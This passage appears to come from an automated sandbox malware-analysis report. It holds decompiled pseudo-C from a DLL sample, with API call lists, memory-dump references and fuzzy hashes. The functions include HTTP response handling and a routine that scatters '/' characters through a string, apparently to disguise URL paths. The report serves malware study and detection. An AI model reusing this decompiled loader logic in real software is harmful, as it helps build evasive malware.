                                                  							_push(0);
                                                  							_push( *_t99);
                                                  							L00ECB0C8();
                                                  							_t74 = _t66 +  *(_t99 - 4);
                                                  							asm("adc edx, esi");
                                                  							_push(0);
                                                  							_push(_v8 + 1);
                                                  							_push(_t92);
                                                  							_push(_t74);
                                                  							L00ECB0C2();
                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                  								_t74 = _t74 | 0xffffffff;
                                                  								_v16 = _v16 & 0x00000000;
                                                  							}
                                                  						} else {
                                                  							_t74 =  *_t99;
                                                  						}
                                                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                  						_a12 = _t74;
                                                  						_t76 = E00EC1FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                  						while(1) {
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							L13:
                                                  							_t92 =  &_v92;
                                                  							if(E00EC8B62(_t79, _t92, _t106) < 0) {
                                                  								break;
                                                  							}
                                                  							L14:
                                                  							_a12 = _a12 + 1;
                                                  							_t76 = E00EC9100(_t79,  &_v92, _t106, _t106);
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						_a8 = _a8 - 1;
                                                  						_t66 = _a12;
                                                  						_t99 = _t99 - 4;
                                                  						 *(0xecd1b0 + _a8 * 4) = _t66;
                                                  					} while (_a8 >= 0);
                                                  					_t97 = _v12;
                                                  					goto L17;
                                                  				}
                                                  				while(_t81 < _t96) {
                                                  					_t81 = _t81 + 1;
                                                  					_t56 = _t56 >> 1;
                                                  					if(_t56 != 0) {
                                                  						continue;
                                                  					}
                                                  					goto L4;
                                                  				}
                                                  				goto L4;
                                                  			}
                                                  Instruction address gutter for the function above (one address per decompiled statement, spilled out of the two-column layout): 0x00ec101a to 0x00ec1196

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00EC10C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00EC10DA
                                                  • memset.NTDLL ref: 00EC117A
                                                  • memset.NTDLL ref: 00EC118A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 7b22694581abfbf51d103dce11005f17e515017af16e1ac772d312647597a643
                                                  • Instruction ID: c1422eaad72df3f169f5b1f896ee6151c6067a48ea99e372dabbbb7471243e5b
                                                  • Opcode Fuzzy Hash: 7b22694581abfbf51d103dce11005f17e515017af16e1ac772d312647597a643
                                                  • Instruction Fuzzy Hash: 0241D331A00249AFDB109FA8DE42FEE77B4EF45310F10956DF91AB7182DB729D568B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 00ECA9BD
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • ResetEvent.KERNEL32(?), ref: 00ECAA31
                                                  • GetLastError.KERNEL32 ref: 00ECAA54
                                                  • GetLastError.KERNEL32 ref: 00ECAAFF
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 9a7403faf6094f8a31c09a333281cbca772ff5c2a358a711e1dfb421573a24e5
                                                  • Instruction ID: 18766c24502820c73b0c0b99fe639d815bae3acba6f604834104572375228f97
                                                  • Opcode Fuzzy Hash: 9a7403faf6094f8a31c09a333281cbca772ff5c2a358a711e1dfb421573a24e5
                                                  • Instruction Fuzzy Hash: 90419F71500208BFD7219FA6DE49EAB7ABDEB85708B18493DF502F10A0E7739946CA20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E00EC39BF(void* __eax, void* __ecx) {
                                                  				char _v8;
                                                  				void* _v12;
                                                  				intOrPtr _v16;
                                                  				char _v20;
                                                  				void* __esi;
                                                  				intOrPtr _t36;
                                                  				intOrPtr* _t37;
                                                  				intOrPtr* _t39;
                                                  				void* _t53;
                                                  				long _t58;
                                                  				void* _t59;
                                                  
                                                  				_t53 = __ecx;
                                                  				_t59 = __eax;
                                                  				_t58 = 0;
                                                  				ResetEvent( *(__eax + 0x1c));
                                                  				_push( &_v8);
                                                  				_push(4);
                                                  				_push( &_v20);
                                                  				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  				if( *0xecd134() != 0) {
                                                  					L5:
                                                  					if(_v8 == 0) {
                                                  						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                  						L21:
                                                  						return _t58;
                                                  					}
                                                  					 *0xecd168(0, 1,  &_v12);
                                                  					if(0 != 0) {
                                                  						_t58 = 8;
                                                  						goto L21;
                                                  					}
                                                  					_t36 = E00EC2049(0x1000);
                                                  					_v16 = _t36;
                                                  					if(_t36 == 0) {
                                                  						_t58 = 8;
                                                  						L18:
                                                  						_t37 = _v12;
                                                  						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                  						goto L21;
                                                  					}
                                                  					_push(0);
                                                  					_push(_v8);
                                                  					_push( &_v20);
                                                  					while(1) {
                                                  						_t39 = _v12;
                                                  						_t56 =  *_t39;
                                                  						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                  						ResetEvent( *(_t59 + 0x1c));
                                                  						_push( &_v8);
                                                  						_push(0x1000);
                                                  						_push(_v16);
                                                  						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  						if( *0xecd134() != 0) {
                                                  							goto L13;
                                                  						}
                                                  						_t58 = GetLastError();
                                                  						if(_t58 != 0x3e5) {
                                                  							L15:
                                                  							E00EC9039(_v16);
                                                  							if(_t58 == 0) {
                                                  								_t58 = E00EC7A07(_v12, _t59);
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_t58 = E00EC1C47( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						L13:
                                                  						_t58 = 0;
                                                  						if(_v8 == 0) {
                                                  							goto L15;
                                                  						}
                                                  						_push(0);
                                                  						_push(_v8);
                                                  						_push(_v16);
                                                  					}
                                                  				}
                                                  				_t58 = GetLastError();
                                                  				if(_t58 != 0x3e5) {
                                                  					L4:
                                                  					if(_t58 != 0) {
                                                  						goto L21;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  				_t58 = E00EC1C47( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                  				if(_t58 != 0) {
                                                  					goto L21;
                                                  				}
                                                  				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  				goto L4;
                                                  			}

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 00EC39D5
                                                  • GetLastError.KERNEL32 ref: 00EC39EE
                                                    • Part of subcall function 00EC1C47: WaitForMultipleObjects.KERNEL32(00000002,00ECAA72,00000000,00ECAA72,?,?,?,00ECAA72,0000EA60), ref: 00EC1C62
                                                  • ResetEvent.KERNEL32(?), ref: 00EC3A67
                                                  • GetLastError.KERNEL32 ref: 00EC3A82
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: 077c70c1d19aff6217f61981ef3a4f23c79f4f12e78eced03ff4817327b639ab
                                                  • Instruction ID: 56f9ec7d7e8f28ae18cd10ab76e93464db774f2e89223b5ba0c48218067b3312
                                                  • Opcode Fuzzy Hash: 077c70c1d19aff6217f61981ef3a4f23c79f4f12e78eced03ff4817327b639ab
                                                  • Instruction Fuzzy Hash: 3331D532600604AFCB11DBB5CD44FAEB7B9EF84354F24456DE595B3190E732EA678B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E00EC42EA(signed int _a4, signed int* _a8) {
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				signed int _t6;
                                                  				intOrPtr _t8;
                                                  				intOrPtr _t12;
                                                  				short* _t19;
                                                  				void* _t25;
                                                  				void* _t26;
                                                  				signed int* _t28;
                                                  				CHAR* _t30;
                                                  				long _t31;
                                                  				intOrPtr* _t32;
                                                  
                                                  				_t6 =  *0xecd270; // 0xd448b889
                                                  				_t32 = _a4;
                                                  				_a4 = _t6 ^ 0x109a6410;
                                                  				_t8 =  *0xecd27c; // 0x213a5a8
                                                  				_t3 = _t8 + 0xece862; // 0x61636f4c
                                                  				_t25 = 0;
                                                  				_t30 = E00EC7A9A(_t3, 1);
                                                  				if(_t30 != 0) {
                                                  					_t25 = CreateEventA(0xecd2a8, 1, 0, _t30);
                                                  					E00EC9039(_t30);
                                                  				}
                                                  				_t12 =  *0xecd25c; // 0x2000000a
                                                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00EC757F() != 0) {
                                                  					L12:
                                                  					_t28 = _a8;
                                                  					if(_t28 != 0) {
                                                  						 *_t28 =  *_t28 | 0x00000001;
                                                  					}
                                                  					_t31 = E00EC205E(_t32, _t26);
                                                  					if(_t31 == 0 && _t25 != 0) {
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  					}
                                                  					if(_t28 != 0 && _t31 != 0) {
                                                  						 *_t28 =  *_t28 & 0xfffffffe;
                                                  					}
                                                  					goto L20;
                                                  				} else {
                                                  					_t19 =  *0xecd0f0( *_t32, 0x20);
                                                  					if(_t19 != 0) {
                                                  						 *_t19 = 0;
                                                  						_t19 = _t19 + 2;
                                                  					}
                                                  					_t31 = E00ECA501(0,  *_t32, _t19, 0);
                                                  					if(_t31 == 0) {
                                                  						if(_t25 == 0) {
                                                  							L22:
                                                  							return _t31;
                                                  						}
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  						if(_t31 == 0) {
                                                  							L20:
                                                  							if(_t25 != 0) {
                                                  								CloseHandle(_t25);
                                                  							}
                                                  							goto L22;
                                                  						}
                                                  					}
                                                  					goto L12;
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00EC7A9A: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00EC96DA,74666F53,00000000,#,00ECD00C,?,00EC23E9), ref: 00EC7AD0
                                                    • Part of subcall function 00EC7A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7AF4
                                                    • Part of subcall function 00EC7A9A: lstrcat.KERNEL32(00000000,00000000), ref: 00EC7AFC
                                                  • CreateEventA.KERNEL32(00ECD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00EC3CA0,?,00000001,?), ref: 00EC432B
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,00EC3CA0,00000000,00000000,?,00000000,?,00EC3CA0,?,00000001,?,?,?,?,00EC6880), ref: 00EC4389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00EC3CA0,?,00000001,?), ref: 00EC43B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00EC3CA0,?,00000001,?,?,?,?,00EC6880), ref: 00EC43CF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 26e0c948d7a0ee989c2a8379314c0ccc6cd24369017926ca307f1f2c1fcdcfab
                                                  • Instruction ID: 4106a67848ef9d7b3daa5f847c04a81b19728315d19f67c67f2e829574c7a5f1
                                                  • Opcode Fuzzy Hash: 26e0c948d7a0ee989c2a8379314c0ccc6cd24369017926ca307f1f2c1fcdcfab
                                                  • Instruction Fuzzy Hash: CF2122B25002819BC7316BAD9E55F6A73E8EBC8724B15223DF955FB290E663CC038690
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 38%
                                                  			E00ECA0B2(void* __ecx, void* __esi) {
                                                  				char _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				long _v20;
                                                  				long _t34;
                                                  				long _t39;
                                                  				long _t42;
                                                  				long _t56;
                                                  				intOrPtr _t58;
                                                  				void* _t59;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  
                                                  				_t61 = __esi;
                                                  				_t59 = __ecx;
                                                  				_t60 =  *0xecd144; // 0xecad81
                                                  				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                  				do {
                                                  					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                  					_v20 = _t34;
                                                  					if(_t34 != 0) {
                                                  						L3:
                                                  						_push( &_v16);
                                                  						_push( &_v8);
                                                  						_push(_t61 + 0x2c);
                                                  						_push(0x20000013);
                                                  						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  						_v8 = 4;
                                                  						_v16 = 0;
                                                  						if( *_t60() == 0) {
                                                  							_t39 = GetLastError();
                                                  							_v12 = _t39;
                                                  							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                  								L15:
                                                  								return _v12;
                                                  							} else {
                                                  								goto L11;
                                                  							}
                                                  						}
                                                  						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                  							goto L11;
                                                  						} else {
                                                  							_v16 = 0;
                                                  							_v8 = 0;
                                                  							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                  							_t58 = E00EC2049(_v8 + 1);
                                                  							if(_t58 == 0) {
                                                  								_v12 = 8;
                                                  							} else {
                                                  								_push( &_v16);
                                                  								_push( &_v8);
                                                  								_push(_t58);
                                                  								_push(0x16);
                                                  								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  								if( *_t60() == 0) {
                                                  									E00EC9039(_t58);
                                                  									_v12 = GetLastError();
                                                  								} else {
                                                  									 *((char*)(_t58 + _v8)) = 0;
                                                  									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                  								}
                                                  							}
                                                  							goto L15;
                                                  						}
                                                  					}
                                                  					SetEvent( *(_t61 + 0x1c));
                                                  					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                  					_v12 = _t56;
                                                  					if(_t56 != 0) {
                                                  						goto L15;
                                                  					}
                                                  					goto L3;
                                                  					L11:
                                                  					_t42 = E00EC1C47( *(_t61 + 0x1c), _t59, 0xea60);
                                                  					_v12 = _t42;
                                                  				} while (_t42 == 0);
                                                  				goto L15;
                                                  			}

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 00ECA0C9
                                                  • SetEvent.KERNEL32(?), ref: 00ECA0D9
                                                  • GetLastError.KERNEL32 ref: 00ECA162
                                                    • Part of subcall function 00EC1C47: WaitForMultipleObjects.KERNEL32(00000002,00ECAA72,00000000,00ECAA72,?,?,?,00ECAA72,0000EA60), ref: 00EC1C62
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • GetLastError.KERNEL32(00000000), ref: 00ECA197
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 1bf20daf770f3d578db069d563af8f5a8a8a2cbbf7c8c60aac5253c561ad1749
                                                  • Instruction ID: 05443070dc063b3322bdaea1563407823ee5040143a0e831a32997aa990d886f
                                                  • Opcode Fuzzy Hash: 1bf20daf770f3d578db069d563af8f5a8a8a2cbbf7c8c60aac5253c561ad1749
                                                  • Instruction Fuzzy Hash: 34311CB590020CEFDB20DFD5CD80EAEBBB8EB04348F18557EE502E2151D7329E4A9B11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 40%
                                                  			E00EC3BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                  				intOrPtr _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				char _v32;
                                                  				void* __esi;
                                                  				void* _t29;
                                                  				void* _t38;
                                                  				signed int* _t39;
                                                  				void* _t40;
                                                  
                                                  				_t36 = __ecx;
                                                  				_v32 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v12 = _a4;
                                                  				_t38 = E00EC9763(__ecx,  &_v32);
                                                  				if(_t38 != 0) {
                                                  					L12:
                                                  					_t39 = _a8;
                                                  					L13:
                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                  						_t16 =  &(_t39[1]); // 0x5
                                                  						_t23 = _t16;
                                                  						if( *_t16 != 0) {
                                                  							E00ECA022(_t23);
                                                  						}
                                                  					}
                                                  					return _t38;
                                                  				}
                                                  				if(E00ECA72D(0x40,  &_v16) != 0) {
                                                  					_v16 = 0;
                                                  				}
                                                  				_t40 = CreateEventA(0xecd2a8, 1, 0,  *0xecd344);
                                                  				if(_t40 != 0) {
                                                  					SetEvent(_t40);
                                                  					Sleep(0xbb8);
                                                  					CloseHandle(_t40);
                                                  				}
                                                  				_push( &_v32);
                                                  				if(_a12 == 0) {
                                                  					_t29 = E00EC8A51(_t36);
                                                  				} else {
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_t29 = E00EC17D5(_t36);
                                                  				}
                                                  				_t41 = _v16;
                                                  				_t38 = _t29;
                                                  				if(_v16 != 0) {
                                                  					E00EC1F99(_t41);
                                                  				}
                                                  				if(_t38 != 0) {
                                                  					goto L12;
                                                  				} else {
                                                  					_t39 = _a8;
                                                  					_t38 = E00EC42EA( &_v32, _t39);
                                                  					goto L13;
                                                  				}
                                                  			}

                                                  APIs
                                                  • CreateEventA.KERNEL32(00ECD2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,00EC6880,?,00000001,?), ref: 00EC3C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,00EC6880,?,00000001,?,00000002,?,?,00EC2417,?), ref: 00EC3C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,00EC6880,?,00000001,?,00000002,?,?,00EC2417,?), ref: 00EC3C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00EC6880,?,00000001,?,00000002,?,?,00EC2417,?), ref: 00EC3C61
                                                    • Part of subcall function 00EC8A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,00EC3C81,?,00EC3C81,?,?,?,?,?,00EC3C81,?), ref: 00EC8B2B
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: fea542abae9a32cacfa917c7222a9cdfce6242068da1ecadc36b0a4463d3476d
                                                  • Instruction ID: 8de698a62c2757e143236b1634ba622e18c96388680b35d52f098f6ba8699c96
                                                  • Opcode Fuzzy Hash: fea542abae9a32cacfa917c7222a9cdfce6242068da1ecadc36b0a4463d3476d
                                                  • Instruction Fuzzy Hash: 7C21A172D00208ABCB10AFF58A85EEEF3B9AB44354B15942DFA11B3100D7369E478BB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E00EC788B(unsigned int __eax, void* __ecx) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed int _t21;
                                                  				signed short _t23;
                                                  				char* _t27;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				unsigned int _t33;
                                                  				void* _t37;
                                                  				unsigned int _t38;
                                                  				void* _t41;
                                                  				void* _t42;
                                                  				int _t45;
                                                  				void* _t46;
                                                  
                                                  				_t42 = __eax;
                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                  				_t38 = __eax;
                                                  				_t30 = RtlAllocateHeap( *0xecd238, 0, (__eax >> 3) + __eax + 1);
                                                  				_v12 = _t30;
                                                  				if(_t30 != 0) {
                                                  					_v8 = _t42;
                                                  					do {
                                                  						_t33 = 0x18;
                                                  						if(_t38 <= _t33) {
                                                  							_t33 = _t38;
                                                  						}
                                                  						_t21 =  *0xecd250; // 0xdbf42606
                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                  						 *0xecd250 = _t23;
                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                  						memcpy(_t30, _v8, _t45);
                                                  						_v8 = _v8 + _t45;
                                                  						_t27 = _t30 + _t45;
                                                  						_t38 = _t38 - _t45;
                                                  						_t46 = _t46 + 0xc;
                                                  						 *_t27 = 0x2f;
                                                  						_t13 = _t27 + 1; // 0x1
                                                  						_t30 = _t13;
                                                  					} while (_t38 > 8);
                                                  					memcpy(_t30, _v8, _t38 + 1);
                                                  				}
                                                  				return _v12;
                                                  			}

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00EC839A,00000000,?,?,00ECA428,?,030095B0), ref: 00EC7896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00EC78AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00EC839A,00000000,?,?,00ECA428,?,030095B0), ref: 00EC78F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 00EC7913
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 619ad0e3ea12acd1cbea58c46ce2b77fdf16612d87750fb0a922b18b2e3438e9
                                                  • Instruction ID: 0094ad1a670625e197bd8317be7b5ecf2433c0df3e52cafc1c18187518296840
                                                  • Opcode Fuzzy Hash: 619ad0e3ea12acd1cbea58c46ce2b77fdf16612d87750fb0a922b18b2e3438e9
                                                  • Instruction Fuzzy Hash: CE110A72A00114AFC7148B6ADD85E9EBBEEEB81350B15017AF505A7160E7729E06C750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E00EC7A9A(intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v20;
                                                  				void* _t8;
                                                  				void* _t13;
                                                  				void* _t16;
                                                  				char* _t18;
                                                  				void* _t19;
                                                  
                                                  				_t19 = 0x27;
                                                  				_t1 =  &_v20; // 0x74666f53
                                                  				_t18 = 0;
                                                  				E00EC6B43(_t8, _t1);
                                                  				_t16 = E00EC2049(_t19);
                                                  				if(_t16 != 0) {
                                                  					_t3 =  &_v20; // 0x74666f53
                                                  					_t13 = E00EC86D8(_t3, _t16, _a8);
                                                  					if(_a4 != 0) {
                                                  						__imp__(_a4);
                                                  						_t19 = _t13 + 0x27;
                                                  					}
                                                  					_t18 = E00EC2049(_t19);
                                                  					if(_t18 != 0) {
                                                  						 *_t18 = 0;
                                                  						if(_a4 != 0) {
                                                  							__imp__(_t18, _a4);
                                                  						}
                                                  						__imp__(_t18, _t16);
                                                  					}
                                                  					E00EC9039(_t16);
                                                  				}
                                                  				return _t18;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                    • Part of subcall function 00EC86D8: wsprintfA.USER32 ref: 00EC8734
                                                  • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00EC96DA,74666F53,00000000,#,00ECD00C,?,00EC23E9), ref: 00EC7AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00EC7AFC
                                                  Strings
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: 78d9c1699b804a1b6482872f3c75d484f8284bedb5da96a0b448bf3ff13e97c1
                                                  • Instruction ID: 36687de48889d184c56b2de3e9cdebc9d8594a7a4e001e34541b089fb9bd30b7
                                                  • Opcode Fuzzy Hash: 78d9c1699b804a1b6482872f3c75d484f8284bedb5da96a0b448bf3ff13e97c1
                                                  • Instruction Fuzzy Hash: 6201F732100215ABC7126BA69D86FEF3BA9EF80345F04502AFA0575111DB378E47C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC7C61(void* __esi) {
                                                  				struct _SECURITY_ATTRIBUTES* _v4;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  
                                                  				_v4 = 0;
                                                  				memset(__esi, 0, 0x38);
                                                  				_t8 = CreateEventA(0, 1, 0, 0);
                                                  				 *(__esi + 0x1c) = _t8;
                                                  				if(_t8 != 0) {
                                                  					_t10 = CreateEventA(0, 1, 1, 0);
                                                  					 *(__esi + 0x20) = _t10;
                                                  					if(_t10 == 0) {
                                                  						CloseHandle( *(__esi + 0x1c));
                                                  					} else {
                                                  						_v4 = 1;
                                                  					}
                                                  				}
                                                  				return _v4;
                                                  			}







                                                  APIs
                                                  • memset.NTDLL ref: 00EC7C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 00EC7C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00EC7C91
                                                  • CloseHandle.KERNEL32(?), ref: 00EC7CA3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
